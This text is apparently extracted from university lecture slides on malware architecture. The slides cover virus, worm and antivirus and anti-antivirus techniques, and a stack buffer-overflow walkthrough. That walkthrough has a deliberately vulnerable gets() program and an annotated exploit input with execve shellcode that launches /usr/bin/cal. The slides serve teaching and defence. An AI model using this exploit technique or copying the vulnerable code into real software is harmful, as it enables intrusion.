Malware
Architecture
COEN 250
Malware Types

Self-replicating malware
 Creates
new instances of itself
 In contrast to passive replication

Population growth
 Changes

in number of instances
Parasitic malware
 Requires
some other executable code to exist
Malware Types

Logic Bomb
 not
self-replicating, zero population growth, possibly
parasitic
 Consists of

Payload


An action to be performed
Trigger

Boolean condition to be executed
 Example:
 If Thomas Schwarz is not getting paid then delete the COEN
website.
Malware Types

Trojan Horse
 parasitic
 Program
that purports doing something benign
 But secretely performs a malicious task
 Example:


Authentic looking login page with username and password
prompt
Stores result in a file, exits user, so that true login page
appears
Malware Types

Backdoor


Mechanism that bypasses normal security checks
Virus





Self-replicating
Positive Population Growth
Parasitic
Runs when a certain executable runs
Infects other executables


Traveling on same system, floppy, CD, DVD, USB
First mentioned in SF novel “The Scarred Man” Gregory
Benford, 1970
Malware Types

Worm
 self-replicating
 positive
population growth
 not parasitic
 Spread from machine to machine across a
network
Malware Types

Rabbits
 Tries
to consume all system resources by
multiplying quickly

Fork bomb
 A worm
that deletes itself after infecting
another machine

Worm hops from machine to machine
Malware Types

Spyware
 Software
that collects information from a
system and transmits it to someone else.

Addware
 Spyware
that presents adds.
Virus

Viruses consist of
 Infection

Mechanism
Can be multipartite
 Trigger
(optional)
 Payload (optional)
Virus

Target Classification
 Boot-Sector
Infectors
 File Infectors
 Macro Viruses

Concealment Strategy Classification
 No
Concealment
 Encryption
 Stealth
 Oligomorphism, Polymorphism, Metamorphism
Virus: Boot Sector Infectors
Contains code that runs when a system
starts up.
 Volume Boot Record

 First
sector of an unpartitioned storage device
 First sector of an individual partition

Master Boot Record
 First
sector of data storage device that has
been partitioned
Virus: Boot Sector Infectors

Booting:

Bootstrap loader



Loads software to start OS
Multi-stage bootstrap loader
Boot sequence on IBM-PC



Runs instruction at memory location F000:FFF0 of BIOS
Jumps to execution of BIOS startup program
Executes Power-On Self-Test (POST)



Checks, initializes devices
Goes through preconfigured list of devices
If it finds bootable device, loads, and executes boot sector




Assume MBR on hard drive
MBR contains address of bootable partition
Load boot sector of bootable partition
Boot sector moves OS kernel into memory and starts it
Virus: Boot Sector Infectors

Boot Sector Infector
 Copies itself into the MBR or VBR
 Typically after making copy of MBR
location”
 Michelangelo:




April 1991
Moves original boot sector to safe location
Infects all floppy disks inserted into computer
Payload:


in a “safe
overwrites file system with zeroes
Extinct in the wild
Virus: Boot Sector Infectors

Boot Sector Infector

Stoned Virus




Original version infects only 360KB diskettes
1988
Many variants
Behavior





Becomes memory resident
Disables interrupt 12
Infects MBR
Infects all diskettes
 Moves boot sector to sector 11 and copies itself into sector 0
 Same values as chosen by Michelangelo, so that computers infected with
both became immediately dysfunctional
 Usually destroys part of the file system
Payload: Displays message during boot process:


“Your PC is now Stoned!
Your computer is now stoned.
Virus: Boot Sector Infectors

Extinct in the wild:
 Floppies
are rarely used to boot, disabling the
propagation mechanism
 OS prevent writing to a disk’s boot sector
without proper authorization
 BIOS can enable boot block protection
Virus: File Infectors

Virus infects executables
 Virus

is placed in an executable
Prepending Virus: At the beginning
Execution of a *.com loads file into memory
 Set PC to beginning of file
 Often copies infected file further down

Virus: File Infectors

Appending Virus: At the end
 To


get control
Save original instruction in code, replace by jump to viral
code, execute virus, restore original instruction and jump to
them or run original instruction at saved location followed by
jump to the rest of the code
Executable file formats can specify start location in file
header
Virus: File Infectors

Overwriting Viruses
 Atop
original code
 Does not change file size
 Virus gets control in normal execution of file
 Placement Strategies:




Place virus in superfluous data
Place virus in file slack or unused allocated file space
Stash overwritten contents in a companion file
Compress (parts of) the original file, decompress
Virus: File Infectors

Inserting Virus
 Move
target code out of way
 Intersperse small pieces of virus with infected
file

Companion Virus
 Virus
gets executed before infected file
 Infected file barely changed
Virus: File Infectors

Companion Virus Example

Change name of target file



Virus placed earlier in search path




notepad.exe in a different directory than real notepad.exe
notepad.com is executed before notepad.exe
Use Windows registry to change association for .exe files
Change “interpreter in ELF files


Copy notepad.exe to notepad.exp
Virus is in new notepad.exe, which calls notepad.exp
Typically the run-time linker, but now virus
Associate icon of target with virus
Virus: Macro Virus

Macros
 Code
that is part of documents.
 Used extensively in MS Office Tools


Written in or translated to Visual Basic for
Applications (VBA) code
Macro Virus
 Changes
or creates new macro
Virus: Macro Virus

Example:
 Concept
1995-1997
 Infects Word’s global document-template
NORMAL.DOT
Creates PayLoad and FileSaveAs macros
 Infects all documents saved with the Save As
command

Virus: Macro Virus

Example: Laroux
–
 Excel macro virus
 Consists of auto_open and check_files
 1996
auto_open executes whenever an infected
spreadsheet is opened, followed by check_files
 Virus looks for PERSONAL.XLS

 Virus
contains no malicious payload
Virus: Macro Virus

Protective Strategies
 Later
versions of MS Office have security
levels for execution of macros

Level high only executes signed macros
 MS
Office provides warnings when files
contain macros
 ScanProt (Word prior to 7.0a) scans for the
Concept virus
Virus: Concealment

Encryption
 Virus
body is encrypted to make it harder to
detect
 Virus needs to contain a decryption engine
 Encryption methods range from very simple to
strong
Virus: Concealment

Stealth
 Virus takes active steps to conceal infection
 Restore original file timestamp
 Intercept system calls to play back original information of file




Change I/O calls in DOS
Change system libraries in more sophisticated OS
Run rootkit
Anti-stealth virus
 Virus
makes all files look infected
 Payload: Anti-virus software deletes all other files
Virus: Concealment

Oligomorphism

Encrypted virus changes encryption key between infections
 Infected files have different file signatures

Polymorphism

Virus also changes decryption engine


By using equivalent instruction sequences
By using different versions


Tremor had 6 decryption engines
Makes it difficult for virus to detect its presence





Virus can use specific timestamp (e.g. add 100 to file year)
Pad file sizes of infected files to a certain value
Use hidden flags in ELF format
Use metadata or alternative data streams (in NTFS)
Store data in registry or other location
Virus: Concealment

Hiding Decryptor Engine

Using a mutation engine

Instruction equivalence











All these set register r0 to zero:
 clear r0
 xor r0,r0
 and 0, r0
 move 0, r0
Instruction sequence equivalence
Instruction reordering
Register renaming
Data reordering
Spaghetti code
Junk code insertion
Run-time code generation
Use a virtual machine
Use concurrent threads to make analysis difficult
Inlining, outlining, call sequence changes
Virus: Concealment

Metamorphism
 Use
code modification to change body of virus
Virus: Antivirus Techniques
Detection
 Identification
 Disinfection

Virus: Antivirus Techniques
Static Detection Mechanism
On-demand / On –access scanning
 Virus signatures a.k.a scan strings:

 Identifying
substrings in infected code
 Problem: How to search for many patterns at
once

Static Heuristics
 Positive
Heuristics
 Negative Heuristics
Virus: Antivirus Techniques
Static Detection Mechanism

Positive Heuristics (Boosters)









Junk code
Decryption loops
Self-modifying code
Use of undocumented API
Manipulation of interrupt vectors
Unusual instructions, especially those not emitted by a compiler
Strings containing obscenities or “virus”
Difference between entry point and end of file
Spectral analysis

Frequency analysis of instructions
Virus: Antivirus Techniques
Static Detection Mechanism

Negative heuristics = stoppers
 user
input
 GUI popups

Analysis
 Weighted

measure
trained by good and bad sets
 Neural
networks
 Data mining
Virus: Antivirus Techniques
Static Detection Mechanism

Integrity Checks
 Tripwire:
 Calculate cryptographically secure hash of all system files
 Store it in unchangable directory



E.g. CD-ROM
Scan periodically to check integrity of all system files
Updates:



Check integrity of system
Patch system
Calculate new checksums
 Self-checking
of antivirus software
Virus: Antivirus Techniques
Dynamic Methods

Behavior blockers:
 Software
monitors running program in real time
 Watches for suspicious activity such as file system
accesses


Appending virus opens executable for reading and writing
Generates activity signature of bad pattern:

 Use
open, read, write, seek to end, appending, close
notion of ownership to prevent too many false
positives
Virus: Antivirus Techniques
Dynamic Methods

Emulation


Emulation uses dynamic heuristics



Analyze code before letting it run
Same as static heuristics
Same as behavior blockers
Emulation uses generic decryption

Use virus’ own decryption loop to scan for decrypted virus

Decryption loop should have run when:



Program accesses code that it just modified
24B + of modified memory
Emulator can run signature searches some time into runtime of emulated code
Virus: Antivirus Techniques
Dynamic Methods

Emulator Architecture


1.
2.
3.
4.
Single stepping through a program can be detected by virus through
timing
Instead:
CPU emulation
Memory emulation
Hardware and OS emulation
Emulation control

Major Issue: When to stop




5.
Number of instructions
Amount of time spent emulating
Proportion of instructions that modify memory
Presence of stoppers
Post Analysis Data


Instruction histogram
Dead code
Virus: Antivirus Techniques
Dynamic Methods

Reentering emulation:
 Virus
code can be CPU specific. Emulation
might need to run with different CPU
parameters.
 Installation of interrupt handlers should trigger
emulation of the interrupt handlers

Using goats to verify infective behavior
 Emulator
provides a goat file to suspect file to
see changes.
Virus: Antivirus Techniques
Verification and Identification

Verification



reduces false positives
necessary for disinfection
Difficult only with polymorphic viruses

Try to decrypt virus body – X-raying



Side effect of emulating decryptor engine
Breaking weak encryption
Identify using



signatures
known copy of virus
check-summing of virus
Virus: Antivirus Techniques
Quarantine

Quarantine isolates infected file from rest
of the system
 Often,
copying of file to a quarantine directory
 Trivially encrypt file to make it unrunnable
 Render files in quarantine directory invisible
Virus: Antivirus Techniques
Disinfection
Restore files from backup
 Virus-specific actions

Virus: Antivirus Techniques
Anti-Macro Virus

Macro can change through reformatting
 MS
Word document converter has produced
new versions of a macro virus
 Bugs in macro virus propagation mechanism
can introduce new variants
 Macro virus can incorporate other macros

Happened to a Word macro snatching two antivirus macros from MS
Anti-Anti-Virus Techniques
Aggressively attack anti-virus software
 Impede anti-virus analysis by anti-virus
labs
 Use knowledge of anti-virus mechanisms
to avoid dectection
 Not anti-virus virus

 “Beneficial”
virus
Anti-Anti-Virus Techniques
Retrovirus

Disables anti-virus software
 Virus
has list of process names of anti-virus products
 Kills any processes with these names
 Disables antivirus program


Ganda inspects programs that run at start-up (autorun)
Replaces first instruction of identified anti-virus programs with
a return
 Reduce
priority of anti-virus software so that it never
runs
 Disable look-up of antivirus software updates
Anti-Anti-Virus Techniques

Entry point obfuscation (EPO)
 Alternative

ways of getting virus code to run
Simile, Ganda look for calls to ExitProcess API
Anti-Anti-Virus Techniques
Anti-Emulation

Outlast emulation
 Virus
can do nothing bad for a long time
 Virus only replicates randomly
 Entry-point obfuscation also delays virus
execution

Outsmarting emulation
 Restructure

viral code
No longer looks like a virus
Anti-Anti-Virus Techniques
Anti-Emulation

Emulator detection

Use undocumented CPU instructions



Exploit differences in CPU
Attack emulator memory system




E.g. emulator returns always the same time stamp
Import obscure libraries
Looking for external things


use many memory addresses
go to unusual memory locations
Test for changes between API calls


In the hope that emulator crashes on them
Hard to emulate
Check for specific emulators
Anti-Anti-Virus Techniques
Armoring, Anti-Debugging

Armoring


Use anti-reverse engineering techniques to make analysis of
virus behavior difficult
Detecting Debug Mode


Use debugger specific idiosyncrasies
Detect breakpoint insertion


Breakpoints are implemented through system interrupts
Check for single-stepping

Interrupt dumps info on stack




Push on stack, then pop, see whether item is still there
Check for system time
Manipulate prefetch queue in CPU
Use IsDebuggerPresent API
Anti-Anti-Virus Techniques
Tunneling
Tunneling virus backtracks interrupt chain
to go directly to DOS and BIOS interrupt
handlers
 Avoids monitoring
 Only possible in MS-DOS

 Kernel
software protected in other OS
Anti-Anti-Virus Techniques
Anti-Integrity Checking
Polymorphic virus can hide file changes
against simple checksums
 Slow virus only changes files that are
about to be changed anyway

Anti-Anti-Virus Techniques
Avoidance

Virus infects areas that are not checked by
anti-virus software
Worms
Worms:
 Propagates across a network
 Typically, does not require user action for
propagation.
Virus:
 Infects files.
 Typically requires user interaction
Worms
Worm Components
Warhead
 Propagation Engine
 Target Selection Algorithm
 Scanning Engine
 Payload

Worms: Warhead

A piece of code that exploits a vulnerability
on the target system
 Exploits
such as Buffer Overflow Exploits
 File Sharing Attacks
 E-mail
 Common Mis-configurations
Worms:
Propagation Engine



After gaining access, the worm must transfer itself to the
target machine.
Some worms are completely contained in the warhead.
File Transfer Mechanisms




FTP
TFTP
HTTP
SMB (MS Server Message Block)


Windows file sharing
Unix servers running SAMBA
Worms:
Target Selection Algorithm

Once the worm has gained control of a
target, it starts looking for new targets.
 E-mail
addresses
 Host lists
 Trusted Systems
 Network Neighborhood
 DNS queries
 Randomly selected ip address.
Worms: Scanning Engine

Once targets are identified, the worm
scans for the original vulnerability.
Worms: Payload




Some specific action done on behalf of the
attacker.
Opening up a backdoor.
Planting a distributed denial of service attack.
Performing complex calculations:
 password
cracking
 math research (actually happened)
Worms: Spreading

Worm spread is limited
 Diversity

“Tiny Worm”



of machines
targeted only machines running security software from a
medium company
was successful in infecting most machines with that software.
Worms can contain support for multiple entry methods.
 Too
many victims crash
 Fast worms can cause network congestion
Worm Trends:



Multiplatform worms
Multiexploit worms
Zero-day exploit worms


Fast-spreading worms: Warhol / Flash


pre-scan targets
Polymorphic worms


No chance to patch
Change appearance
Metamorphic worms

Change functionality
Strings

Attacks
A buffer overflow occurs when data is written
outside of the boundaries of the memory
allocated to a particular data structure.
11 Bytes of Data
Source
Memory
Copy
Operation
Allocated Memory (8 Bytes)
Other Memory
Strings

Attacks
Buffer overflow occur because we usually
do not check bounds.
 Standard
library functions do not check
bounds.
 Programmers do not check bounds.

Not all buffer overflows are exploitable.
Strings

Attacks
Process Memory Organization
Code or Text: Instructions
and read only data
Data: Initialized data,
uninitialized data, static
variables, global variables
Heap: Dynamically
allocated variables
Stack: Local variables,
return addresses, etc.
Attacks
Stack Management

When calling a subroutine / function:
 Stack
stores the return address
 Stack stores arguments, return values
 Stack stores variables local to the subroutine

Information pushed on the stack for a subroutine
call is called a frame.
 Address
of frame is stored in the frame or base point
register.

epb on Intel architectures
Attacks
Stack Management
#include <iostream>
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password, “badprog"))
return(true);
else return(false);
}
void main()
{
bool PwStatus;
puts("Enter password:");
PwStatus = IsPasswordOkay();
if (PwStatus == false){
puts("Access denied");
exit(-1);
}
else puts("Access granted");
}
Attacks
Stack Management
Program stack before call to IsPasswordOkay()
Stack
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus==true)
puts("Hello, Master");
else puts("Access denied");
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Stack Management
Program stack during call to IsPasswordOkay()
Stack
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus ==true)
puts("Hello, Master");
else puts("Access denied");
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password,"badprog"))
return(true);
else return(false)
}
Storage for Password (8 Bytes)
Caller EBP – Frame Ptr main (4
bytes)
Return Addr Caller – main (4
Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Stack Management
Program stack after call to IsPasswordOkay()
Stack
Storage for Password (8 Bytes)
puts("Enter Password:");
PwStatus=ISPasswordOkay();
if (PwStatus ==true)
puts("Hello, Master");
else puts("Access denied");
Caller EBP – Frame Ptr main (4
bytes)
Return Addr Caller – main (4
Bytes)
Storage for PwStatus (4 bytes)
Caller EBP – Frame Ptr OS (4
bytes)
Return Addr of main – OS (4
Bytes)
…
Attacks
Buffer Overflow Attack

#include <iostream>
bool IsPasswordOkay(void)
{
char Password[8];
What happens if we enter more than 7
characters of an input string?
gets(Password);
if (!strcmp(Password, “badprog"))
return(true);
else return(false);
}
void main()
{
bool PwStatus;
puts("Enter password:");
PwStatus = IsPasswordOkay();
if (PwStatus == false){
puts("Access denied");
exit(-1);
}
else puts("Access granted");
}
Attacks
Buffer Overflow Attack
Stack
Storage for Password (8 Bytes)
“12345678”
bool IsPasswordOkay(void)
{
char Password[8];
gets(Password);
if (!strcmp(Password,"badprog"))
return(true);
else return(false)
}
The return address and other data on the
stack is over written because the memory
space allocated for the password can only
hold a maximum 7 character plus the NULL
terminator.
Caller EBP – Frame Ptr main (4
bytes)
“9012”
Return Addr Caller – main (4
Bytes)
“3456”
Storage for PwStatus (4 bytes)
“7890”
Caller EBP – Frame Ptr OS (4
bytes)
“\0”
Return Addr of main – OS (4
Bytes)
…
Attacks
Buffer Overflow Attack

A specially crafted string
“abcdefghijklW►*!” produced the
following result:
Attacks
Buffer Overflow Attack
The
string “abcdefghijklW►*!”
overwrote 9 extra bytes of
memory on the stack changing the
callers return address thus
skipping the execution of line 3
Line
Statement
1
puts("Enter
Password:");
2
PwStatus=ISPasswordOkay
();
3
if (PwStatus ==true)
4
puts("Hello, Master");
5
else puts("Access
denied");
Stack
Storage for Password (8 Bytes)
“abcdefgh”
Caller EBP – Frame Ptr main (4 bytes)
“ijkl”
Return Addr Caller – main (4 Bytes)
“W►*!” (return to line 4 was line 3)
Storage for PwStatus (4 bytes)
“/0”
Caller EBP – Frame Ptr OS (4 bytes)
Return Addr of main – OS (4 Bytes)
Attacks
Buffer Overflow Exploit

A buffer overflow can be exploited by
 Changing
the return address in order to
change the program flow (arc-injection)
 Change the return address to point into the
buffer where it contains some malicious code
(Code injection)
Attacks
Buffer Overflow Attack

000
010
020
030
040

The get password program can be exploited to
execute arbitrary code by providing the following
binary data file as input:
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38-39
34-35
B0-0B
FF-BF
2F-62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
This exploit is specific to Red Hat Linux 9.0 and GCC
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The first 16 bytes of binary data fill the allocated
storage space for the password.
 NOTE: Even though the program only allocated 12
bytes for the password, the version of the gcc compiler
used allocates stack data in multiples of 16 bytes

Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 12 bytes of binary data fill the extra
storage space that was created by the compiler to
keep the stack aligned on a16-byte boundary.

Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 12 bytes of binary data fill the extra
storage space that was created by the compiler to
keep the stack aligned on a16-byte boundary.

Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The next 4 bytes overwrite the return address.
 The new return address is 0X BF FF F9 E0 (littleendian)

Attacks
Buffer Overflow Attack
Attacks
Buffer Overflow Attack
000
010
020
030
040

31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code.
 Purpose
of malicious code is to call execve with a user
provided set of parameters.
 In this program, instead of spawning a shell, we just call
the linux calculator program.
Attacks
Buffer Overflow Attack
000
010
020
030
040

31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:


xor %eax,%eax #set eax to zero
mov %eax,0xbffff9ff #set to NULL word
 Create
a zero value and use it to NULL terminate
the argument list.
 This is necessary to terminate the argument list.
Attacks
Buffer Overflow Attack
000
010
020
030
040

31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:



xor %eax,%eax #set eax to zero
mov %eax,0xbffff9ff #set to NULL word
mov $0xb,%al #set code for execve
 Set
the value of register al to 0xb. This value
indicates a system call to execve.
Attacks
Buffer Overflow Attack
000
010
020
030
040

31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
 mov $0xb,%al #set code for execve
 mov $0xbffffa03,%ebx #ptr to arg 1
 mov $0xbffff9fb,%ecx #ptr to arg 2
 mov 0xbffff9ff,%edx #ptr to arg 3
 This puts the pointers to the arguments into ebc, ecx, and
edx registers.
Attacks
Buffer Overflow Attack
000
010
020
030
040

31
37
31
F9
31
32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
The malicious code:
 mov $0xbffffa03,%ebx #ptr to arg 1
 mov $0xbffff9fb,%ecx #ptr to arg 2
 mov 0xbffff9ff,%edx
#ptr to arg 3
 int $80 # make system call to execve
 Now make the system call to execve. The arguments are
in the registers.
Attacks
Buffer Overflow Attack
000
010
020
030
040
31
37
31
F9
31
The

32
38
C0
FF
31
33
39
A3
BF
31
34
30
FF
8B
2F
35
31
F9
15
75
36
32
FF
FF
73
37
33
BF
F9
72
38
34
B0
FF
2F
39
35
0B
BF
62
malicious code:
Last part are the arguments.
30
36
BB
CD
69
31
37
03
80
6E
32
38
FA
FF
2F
33
E0
FF
F9
63
34
F9
BF
FF
61
35
FF
B9
BF
6C
36
BF
FB
31
0A
"1234567890123456"
"789012345678a· +"
"1+ú · +¦+· +¦v"
"· +ï§ · +-Ç · +1"
"111/usr/bin/cal “
Attacks
Buffer Overflow Attack

./BufferOverflow < exploit.bin now
executes /usr/bin/cal\0.
Attacks
Primary C / C++ Vulnerabilities

Buffer Overflow

Stack


Heap




integer overflow
Formatted Output Vulnerability


Much harder to prevent
Pointer mistakes
Dynamic Memory Management
Program Flow Mistakes


Can be prevented: Stackguard, Canaries, No-Execute Permission
Only in C, culprit is a printf kludge
Concurrency Issues

Intervening event between check and access
Attacks
Mobile Code Attacks